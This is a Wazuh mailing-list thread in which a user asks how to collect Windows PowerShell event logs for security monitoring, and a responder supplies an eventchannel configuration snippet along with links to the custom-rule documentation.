Monitoring MS Powershell

825 views
Skip to first unread message

Bill Green

unread,
May 14, 2021, 8:42:45 AM5/14/21
to Wazuh mailing list
Good morning,

First I want to say thanks again for all the help this group has been!

I may not be searching the group properly but, I'm trying to determine if and how I would monitor the Windows Powershell event logs under the Application and Service Logs on a Windows client.  

I use Powershell pretty regularly on my laptop and I have the Wazuh client installed but I don't see any of the Powershell events when I look at the security events of my laptop's agent in the dashboard.  So I assume I need to update both the ossec.conf on the manager and the ossec.conf on my laptop but I'm just guessing.

Since so much malware/ransomware uses Powershell covertly I would really love to monitor for odd Powershell usage and appreciate any guidance on how to set that up.

I apologize if this has been addressed in the past and I didn't find the article.

Thanks for your help!
Bill

Rafael Antonio Rodriguez Otero

unread,
May 14, 2021, 10:20:08 AM5/14/21
to Bill Green, Wazuh mailing list
Hello.

I would like to understand more about your problem, can you give me more information? Exactly what do you want to detect?

If you can send me images I will appreciate it.

Greetings.

--
You received this message because you are subscribed to the Google Groups "Wazuh mailing list" group.
To unsubscribe from this group and stop receiving emails from it, send an email to wazuh+un...@googlegroups.com.
To view this discussion on the web visit https://groups.google.com/d/msgid/wazuh/e4ee423d-2018-4b91-879a-8ea7dbbf23b5n%40googlegroups.com.

Bill Green

unread,
May 14, 2021, 12:18:12 PM5/14/21
to Wazuh mailing list
Sure - I apologize I don't think I described the issue very well.  I think all I really meant to ask was how to monitor the PowerShell events that are logged in the Windows Event Viewer.  I"ve attached a screen grab.

I appreciate the help and apologize for the delay in responding.

Bill

powershell event log.PNG

Octavio Valle López

unread,
May 15, 2021, 12:56:56 AM5/15/21
to Wazuh mailing list
Hi, I hope you are well!

It is a very good question, and from the Wazuh side, we agree with you that currently, powershell is an important vector for attackers due to its great power and versatility.

The answer to your question is yes, currently we listen to different types of events through the event channel and those, particularly from the event viewer, are easy to obtain with a configuration similar to this.

<localfile>
<location>Windows PowerShell</location>
<log_format>eventchannel</log_format>
<query>Event/System[EventID \>= 400 and EventID \<= 600]</query>
</localfile>
I will also leave you the documentation so that you can create custom rules, once you receive these events and thus be able to alert or generate a later active response.

https://documentation.wazuh.com/current/user-manual/ruleset/custom.html
https://documentation.wazuh.com/current/user-manual/capabilities/log-data-collection/how-to-collect-wlogs.html#windows-eventlog-vs-windows-eventchannel

My next question is, do you want to go a little further and analyze the buffers that are executed by powershell? There are ways to do it through ETW channels, but it takes a bit more complexity to develop.

Gal Akavia

unread,
Dec 11, 2021, 3:43:10 AM12/11/21
to Wazuh mailing list
Hi octavi,
I'm also at that position, 
I'm working on wazuh-rules to trigged when some spesific ps commands are launched, like IES.
Will be great to hear about "analyze the buffers that are executed by powershell", if still relevant.

Thank's!

Valton T.

unread,
Apr 26, 2023, 8:16:24 AM4/26/23
to Wazuh mailing list
anything about this
Reply all
Reply to author
Forward
0 new messages